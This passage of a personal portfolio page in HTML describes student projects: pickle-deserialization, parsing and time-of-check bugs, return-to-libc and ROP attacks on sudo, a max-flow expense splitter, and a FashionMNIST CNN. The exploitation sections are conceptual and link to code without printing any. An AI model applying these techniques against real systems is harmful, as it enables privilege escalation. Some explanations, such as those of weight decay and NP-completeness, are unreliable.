All this we put inside a class and pickled the class.
When the program unpickles it we get full control of the program.
</p>
<h3>Bad parsing</h3>
<p>
Sometimes parsing the information from the user input can be done in a vulnerable manner. One such example can be found in the project.
</p>
<h3>Time of Check to Time of Use</h3>
<p>
Sometimes user input validation takes a long time, and if we can manipulate the input data between the validation and execution
we can pass the validation and execute whatever we want.
You can see that in action in the project.
</p>
<p>
<a href="https://github.com/nadavgover/Logical-Vulnerabilities" target="_blank">View code</a> and see all the examples on GitHub.
</p>
</div>
</div>
<div id="libc-rop" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Return to libc and Return Oriented Programming (ROP)</h2>
<h3>Background (and some history)</h3>
<p>
Most buffer overflow attacks rely on writing our code into the
stack and then hijacking the flow of the program to execute our code. After this sort
of attacks became popular, some security measures were taken to make it harder to
carry out these attacks.
During 2000-2005, many operating systems began implementing various
protections on the executable space, typically by marking the stack (and/or other
areas of the memory) as non-executable. This prevented the classic buffer overflow
attack we exploited so far, and presented a new challenge for attackers.
In 2006, an attack called return-to-libc was published, describing a mechanism that
enables obtaining a shell in some cases, even with a non-executable stack. This
technique was implemented in the first part of the project.
In 2007, a significantly improved version of this attack was published under the
name return oriented programming (ROP). This was presented in Blackhat 2008,
and enabled executing far more sophisticated codes than return-to-libc. This
technique was implemented in the second part of the project.
Our target in this project is the sudo program. It has a
non-executable stack so regular BOF attack won't work.
</p>
<h3>Inspecting libc memory with GDB</h3>
<p>
Before starting to implement return to libc, we’ll need to understand how to inspect
the memory of libc (the C standard library).
<br>
We can do this with GDB and specifically the <i>info files</i> command and look for
text sections in libc. The important part is that
this section of the memory is executable.
</p>
<h3>Gadget search engine</h3>
<p>
In the second part of the project we’re going to implement ROP attacks! However,
implementing a ROP requires having a working “gadget search engine” that can
search the memory and locate gadgets! It will support searching for the same instruction with multiple combinations of
registers at once, so that we don’t have to try all combinations manually. For
example:
<br>
<br>
<img src="static/img/gadget_search_example.JPG" alt="gadget search example" style="width: 100%; max-width: 500px;">
<br>
<br>
Now we are ready to implement ROP.
</p>
<p>
<a href="https://github.com/nadavgover/Return-to-libc-and-ROP" target="_blank">View code</a> on GitHub.
</p>
</div>
</div>
<div id="splitwise" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Split Expenses With Ford-Fulkerson</h2>
<h3>Background</h3>
<p>
You are Dan. You live in an appartment with 3 roommates. Alice is paying the electricity bill, Bob is paying the water bill,
Carol is paying for the new lights in your balcony and you just went and got groceries for dinner.</br>
The end of the month is here and you want everyone to pay equally so everything will be fair. Unfortunately not everybody paid the same
amount and it could be pretty annoying to calculate how much someone needs to pay to somebody else. Worry not! This is what this app is for! We will
split the expenses equally, and in a pretty cool way. Actuallt this problem is NP-complete, so check out how it is done.
</p>
<h3>How Do You Split the Expenses?</h3>
<p>
Great question. In the big picture we build a graph where each node is a person and each edge is the amount he needs to pay/get. Then apply the
Ford-Fulkerson algorithm to find the max flow and the way that money flows through the graph. And that's it.</br>
Are you ready to dive to the small picture? Here we go.</br>
So how to build the graph exactly? Let's explain that with an example. So let's assume Alice paid 50$, Bob paid 30$, Carol 15$ and Dan paid 5$.
So in order to build the graph we need to:</br>
<ol>
<li>
Calculate the total amount paid.</br>
Amount = 50 + 30 + 15 + 5 = 100
</li>
</br>
<li>
Calculate how much money each person should have paid.</br>
DuePerPerson = Amount / #people = 100 / 4 = 25
</li>
</br>
<li>
Calculate the difference between the amount paid by each person and the DuePerPerson.</br>
diff(Alice) = 50 - 25 = 25</br>
diff(Bob) = 30 - 25 = 5</br>
diff(Carol) = 15 - 25 = -10</br>
diff(Dan) = 5 - 25 = -20</br>
</li>
</br>
<li>
Create a node in the graph for each person.
</li>
</br>
<li>
Create an edge with infinte capacity that connects each person to the other people in the graph.
</li>
</br>
<li>
For each diff calculated (at stage 3), if the value is negative, it means the person still needs to reimburse someone: we add an inward
edge to the person with the capacity equall to diff (absolute value of diff). This represents an inward flow of money into the network. Else,
we create an outward edge with capacity equal to diff. This will represent the outward flow of money from the graph. That way we make sure
each person pays the right amount.
</li>
</br>
<li>
Applying the Ford-Fulkerson algorithm will result in multiple paths that represent the flow of money from one person to another,
which is equivalent to dividing the expenses equally between everybody.</br>
But (!), the Ford-Fulkerson algorithm works with one source node and one sink node, and here we may have more than one person who owes money
(multiple sources), and more than one person who needs to get money back (multiple sinks). In order to solve that we create one big source that connects
to all the small original sources (people who owe money), and similarly we create one big sink that connects to all other small sinks
(people who need to get money back).
</li>
</ol>
And the results are pretty cool:
<br>
<br>
<img src="static/img/splitwise.png" alt="Split expenses with Ford-Fulkerson" style="width: 100%; max-width: 800px;">
<br>
<br>
Alice gets 15$ from Dan and 10$ from Carol, Bob gets 5$ from Dan.<br>
Nice!
</p>
<p>
<a href="https://github.com/nadavgover/Splitwise" target="_blank">View code</a> on GitHub.
</p>
</div>
</div>
<div id="cnn" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Image recognition with Convolutional Neural Network</h2>
<h3>Background</h3>
<p>
In this project we are experimenting with <a href="https://en.wikipedia.org/wiki/Convolutional_neural_network" target="_blank">Convolutional Neural Network</a> (CNN) and different regulariztoin methods.
CNN is a type of a netwrok that performs well with images and object detection so it is only natural that we will deal with images.
And indeed, the data set for this project is FashionMNIST. The FashionMNIST is a dataset that consists of images of different clothing.
Each image is a 28x28 grayscale image, associated with a label from 10 classes.
To get a feeling for the dataset we are working with, lets visualize it!
</br>
</br>
<img src="static/img/fashion_mnist.png" alt="fashion mnist" style="width: 100%; max-width: 400px;">
</br>
</br>
The different regulariztoin methods that were under test are <a href="https://en.wikipedia.org/wiki/Dropout_(neural_networks)" target="_blank">dropout</a>,
<a href="https://en.wikipedia.org/wiki/Regularization_(mathematics)" target="_blank">weight decay</a> and
<a href="https://en.wikipedia.org/wiki/Batch_normalization" target="_blank">batch normalization</a>.
</p>
<h3>Dropout</h3>
<p>
Dropout is a relatively new algorithm for training neural networks which relies on “dropping out”
neurons during training in order to avoid overfitting.
</p>
<h3>Weight Decay</h3>
<p>
In complex networks the loss can get so high that when we come to update all our parameters (weights)
it will nullify them. For this we have weight decay. Before updating the network, we first change the loss
just a little bit to prevent this problem.
</p>
<h3>Batch Normalization</h3>
<p>
We normally normalize our input data.
In batch normalization we also normalize the inputs of the hidden layer.
This gives us a big improvement in the training speed.
</p>
<p>
Below is a cool graph showing accuracies of different learning rates during training the model for this project.
</br>
</br>
<img src="static/img/cnn.jpg" alt="different learning rates" style="width: 100%; max-width: 500px;">
</br>
</br>
</p>
<p>
<a href="https://github.com/nadavgover/Image-Rcognition/" target="_blank">View code</a> on GitHub.
</p>
</div>
</div>
</section>
<footer>
<div id="contact" class="socialbtns">
<ul>
<li>Contact me at:</li>
<li><a href="http://www.github.com/nadavgover" target="_blank"> <i class="fa fa-lg fa-github"></i></a></li>
<li><a href="https://www.instagram.com/nadavgover/" target="_blank"> <i class="fa fa-lg fa-instagram"></i></a></li>
<li><a href="mailto:nadavgover@gmail.com"><i class="fa fa-lg fa-envelope"></i></a></li>
</ul>
</div>
<span class=credits>
Code and design by Nadav Gover
<br>
Drawings by Brooke VanHest  
<a href="https://www.instagram.com/twovintagepaperdolls/" target="_blank"> <i class="fa fa-lg fa-instagram"></i></a>
 
<a href="https://twovintagepaperdolls.com/" target="_blank"> <i class="fa fa-lg fa-globe"></i></a>
</span>
</footer>
</body>
</html>